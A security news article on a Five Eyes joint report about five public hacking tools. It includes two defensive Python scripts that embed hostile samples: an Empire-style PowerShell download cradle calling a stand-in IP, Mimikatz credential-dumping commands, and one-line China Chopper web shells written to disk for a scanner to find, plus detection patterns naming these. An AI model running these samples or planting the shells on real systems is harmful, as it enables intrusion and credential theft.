
Five Eyes Intelligence agencies warn of popular hacking tools

Security agencies belonging to Five Eyes (United States, United Kingdom, Canada, Australia and New Zealand) have released a joint report that details some popular hacking tools.

Experts from the cybersecurity agencies of the Five Eyes intelligence alliance have issued a report that provides technical details on the most popular hacking tool families and explains how to detect and neutralize attacks involving them.

The report was produced with contributions from researchers at the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC), and the US National Cybersecurity and Communications Integration Center (NCCIC).

“This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5]” reads the report published by the experts.

“In it we highlight the use of five publicly available tools, which have been used for malicious purposes in recent cyber incidents around the world. The five tools are:

  1. Remote Access Trojan: JBiFrost
  2. Webshell: China Chopper
  3. Credential Stealer: Mimikatz
  4. Lateral Movement Framework: PowerShell Empire
  5. C2 Obfuscation and Exfiltration: HUC Packet Transmitter

To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.”

The report provides technical details on remote access trojans (RATs), web shells, credential stealers, lateral movement frameworks, and command and control (C&C) obfuscators.

The experts analyzed the JBiFrost RAT, a variant of the Adwind backdoor, which has been used by almost every kind of attacker, from low-skilled crooks to nation-state hackers.

“JBiFrost RAT is typically employed by cyber criminals and low-skilled threat actors, but its capabilities could easily be adapted for use by state-sponsored threat actors.

Other RATs are widely used by Advanced Persistent Threat (APT) actor groups, such as Adwind RAT, against the aerospace and defense sector; or Quasar RAT, by APT10, against a broad range of sectors.” states the report.

“JBiFrost RAT is Java-based, cross-platform, and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, MAC OS X, and Android.”

The report also describes the popular post-exploitation tool Mimikatz, used by many threat actors, and the lateral movement framework PowerShell Empire, which attackers use to escalate privileges, harvest credentials, enumerate nearby hosts, and move laterally across the target network.
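The detection advice the report gives for these two tools comes down to inspecting what is actually launched: PowerShell Empire stagers are typically started as an encoded, hidden-window PowerShell command line, and Mimikatz announces itself through its module syntax (sekurlsa::, lsadump::) or the Invoke-Mimikatz wrapper. The Python below is an added example written for this article, not code from the report or from either tool: it decodes the -EncodedCommand payload (base64 of UTF-16LE, which is what powershell.exe expects) from constructed process-creation events and matches a few indicators against both the raw and the decoded command line. The event format, hostnames, the 198.51.100.7 address and the indicator list are all assumptions; the benign encoded Get-Date event is there to show why decoding has to precede judgement.

```python
import base64
import re

# Constructed sample process-creation events (not real telemetry), formatted as
# "timestamp|host|parent_image|command_line".
def _enc(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Hypothetical Empire-style download cradle pointing at a documentation-range IP (constructed).
_EMPIRE_STAGE = _enc("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7:8080/index.asp')")
# A harmless encoded command, to show that "encoded" alone is not an indicator.
_BENIGN_ENC = _enc("Get-Date")

SAMPLE_EVENTS = [
    "2018-10-11T09:14:02Z|ws-017|explorer.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "2018-10-11T09:15:40Z|ws-017|winword.exe|powershell -noP -sta -w 1 -enc " + _EMPIRE_STAGE,
    "2018-10-11T09:20:13Z|ws-017|cmd.exe|mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit",
    "2018-10-11T09:22:51Z|srv-db2|powershell.exe|powershell -nop -c \"Invoke-Mimikatz -DumpCreds\"",
    "2018-10-11T09:30:00Z|ws-004|svchost.exe|powershell.exe -enc " + _BENIGN_ENC,
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the common short forms are covered here.
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Indicator patterns (assumed for this example). Order matters only for the output list.
INDICATORS = {
    "empire_launcher_flags": re.compile(r"(?i)-nop\b.*-sta\b.*-w\s+1\b"),          # hidden window, no profile, STA
    "download_cradle": re.compile(r"(?i)(?:IEX|Invoke-Expression)\b.*(?:WebClient|DownloadString|DownloadFile)"),
    "amsi_tamper": re.compile(r"(?i)amsiInitFailed|AmsiScanBuffer"),
    "mimikatz_module": re.compile(r"(?i)\b(?:sekurlsa|lsadump|privilege)::"),          # mimikatz module::command syntax
    "mimikatz_powershell": re.compile(r"(?i)Invoke-Mimikatz"),
}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if there is none or it is not valid."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> dict:
    """Match indicators against the raw command line plus its decoded payload, if any."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"decoded": decoded, "indicators": hits}


def scan(events) -> list:
    """Return one finding per event that triggered at least one indicator."""
    findings = []
    for line in events:
        ts, host, parent, cmdline = line.split("|", 3)
        result = classify(cmdline)
        if result["indicators"]:
            findings.append({"ts": ts, "host": host, "parent": parent, **result})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} parent={f['parent']} indicators={f['indicators']}")
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Three of the five events are flagged; the benign encoded Get-Date and the signed backup script are not. In production the same classify() would sit behind Sysmon Event ID 1 or Windows Security Event ID 4688 with command-line auditing enabled, and PowerShell script block logging (Event ID 4104) records the decoded script even when the launcher is obfuscated further than a single base64 layer.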

The experts at the Five Eyes agencies also detailed the China Chopper web shell, a code-injection web shell that executes Microsoft .NET code carried in HTTP POST requests.

China Chopper is a tiny shell (4 KB) that has been widely used in attacks in the wild since 2012. Earlier this year the China-linked APT group Leviathan, aka TEMP.Periscope, used it in attacks on engineering and maritime entities.
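Because the China Chopper server side is a single eval-of-request line, a content scan of the web root is the cheapest check a defender can run. The Python below is an added example for this article, not code from the report or from the tool: it looks for the canonical ASPX form (a Jscript page that passes Request.Item[...] to eval with the "unsafe" flag) and the equivalent PHP form (eval of a request parameter), records the file size since genuine shells are tiny, and runs over a handful of constructed sample files written to a temporary directory. The file names, parameter names and directory layout are invented for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample files (not taken from any real compromise). The first two mimic the
# one-line China Chopper server side; the other two are benign decoys that must not match.
SAMPLE_FILES = {
    "images/help.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["p4ss"],"unsafe");%>',
    "uploads/cache.php": "<?php @eval($_POST['secret']); ?>",
    "default.aspx": '<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Default.aspx.cs" %>\n<html></html>',
    "lib/helper.php": "<?php\nfunction add($a, $b) { return $a + $b; }\n",
}

# Signatures assumed for this example: the ASPX shell evaluates a request item as Jscript with
# the "unsafe" flag; the PHP variant evals a request parameter directly.
SIGNATURES = {
    "aspx_jscript_eval": re.compile(
        r'(?is)<%@\s*Page\s+Language\s*=\s*"Jscript"\s*%>.*eval\s*\(\s*Request\.Item\s*\[[^\]]+\]\s*,\s*"unsafe"'
    ),
    "php_eval_post": re.compile(r"(?is)@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[[^\]]+\]\s*\)"),
}

SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".php", ".jsp")


def scan_content(text: str) -> list:
    """Return the names of every signature that matches the given file content."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_tree(root) -> list:
    """Walk a web root and report every script file that matches a signature, with its size."""
    root = Path(root)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTENSIONS:
            continue
        # errors="replace" keeps the scan going on odd encodings instead of crashing on one file.
        sigs = scan_content(path.read_text(encoding="utf-8", errors="replace"))
        if sigs:
            hits.append({
                "path": path.relative_to(root).as_posix(),
                "size": path.stat().st_size,
                "signatures": sigs,
            })
    return hits


def write_samples(root) -> Path:
    """Materialise the constructed sample files under root so the scan runs on real paths."""
    root = Path(root)
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


def demo_scan() -> list:
    """Write the samples into a temporary web root, scan it, and return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(write_samples(tmp))


if __name__ == "__main__":
    for hit in demo_scan():
        print(f"{hit['path']} ({hit['size']} bytes): {', '.join(hit['signatures'])}")
```

The size is reported rather than used as a filter: an attacker can pad a shell, so the signature, not the byte count, decides. Pair the scan with file-integrity monitoring of the web root and a review of POST requests to script files that the application itself never links to.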

Another hacking tool described in the report is HUC Packet Transmitter (HTran), a proxy tool that intercepts and redirects TCP connections through intermediate hosts; attackers use it to obfuscate their command-and-control communications, bypass security controls and evade detection.

“The individual tools we cover in this report are limited examples of the types of tools used by threat actors. You should not consider this an exhaustive list when planning your network defense.” states the report.

“Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the dark web. Today, malicious tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers, hostile state actors and organized criminals, to amateur cyber criminals.

The tools in this Activity Alert have been used to compromise information across a wide range of critical sectors, including health, finance, government, and defense. Their widespread availability presents a challenge for network defense and threat-actor attribution.”


Pierluigi Paganini

(Security Affairs – Five Eyes, hacking)


Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.
